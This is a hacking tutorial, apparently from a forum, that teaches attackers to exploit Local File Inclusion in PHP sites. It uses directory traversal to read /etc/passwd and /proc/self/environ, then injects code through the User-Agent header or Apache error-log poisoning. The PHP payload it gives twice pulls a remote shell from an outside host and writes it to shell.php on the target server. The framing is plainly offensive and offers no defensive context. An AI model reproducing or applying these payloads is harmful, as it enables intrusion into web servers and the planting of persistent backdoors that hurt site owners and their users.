LFI [Local File Inclusion]

LFI [Local File Inclusion]

[MethoD 1]


NOTE: You will need FireFox and its addon Tamper Data to do this method!


LFI or Local File Inclusion allows you to include a local file(which means, that the file is stored on the server) and run it in a webscript.
In this method we are going to upload a shell by accessing the proc/self/environ.


Now we have our page


http://www.target.com/index.php?include=register.php


And now we are going to do this:


http://www.target.com/index.php?include=../




If it gives you an error message, this is good. Best thing that can happen is, it says "No such file or directory". But anyways, now add this to your url:


http://www.target.com/index.php?include=../etc/passwd





And as long as there is no text other than an error message on the page, keep adding "../" to the URL, so it would be like:


http://www.target.com/index.php?include=../etc/passwd
http://www.target.com/index.php?include=../../etc/passwd
http://www.target.com/index.php?include=../../../etc/passwd




And so on. Now let's say we got to this URL


http://www.target.com/index.php?include=../../../etc/passwd
And we see some huge shitty text we can not handle with. Now change the etc/passwd in the URL to proc/self/environ so it would look like this:


http://www.target.com/index.php?include=../../../proc/self/environ




If you see some text, you did good, if you see an error message you did bad. Now this is the point where we use Tamper Data. Start you Tamper and reload the page, and for user agent you type in the following PHP script:


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.website.com/yourshell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


This will execute the PHP script on the site and create a shell.php on the server. Why? Because the user agent is being displayed on the webpage, and if you put in a webscript for that, it will execute it.


Now simply access your shell by going to


http://www.taget.com/shell.php




And rape the server.


Now LFI method 2


NOTE: This only works on apache servers!


Alright you get back to the point where we tried to access the etc/passwd. You will do the same method, but not with etc/passwd, you will try to get access to apache/logs/error.log


If you have a brain, you should know how to do that, since it's EXACTLY the same method as on etc/passwd (explained in LFI method 1).


Now when you have found the file, open up cmd and type in


telnet www.tagrget.com 80


When you are inside the telnet, you copy the following code(you use your own shell url ofc)


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.website.com/yourshell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Paste it into the telnet window, and press enter once or maybe twice(until you get an error message).


Now refresh the page in the browser(error.log) once and there you go. The PHP script will be executed and your shell will get uploaded to the server. Access it by typing in the following into your browser:


http://www.taget.com/shell.php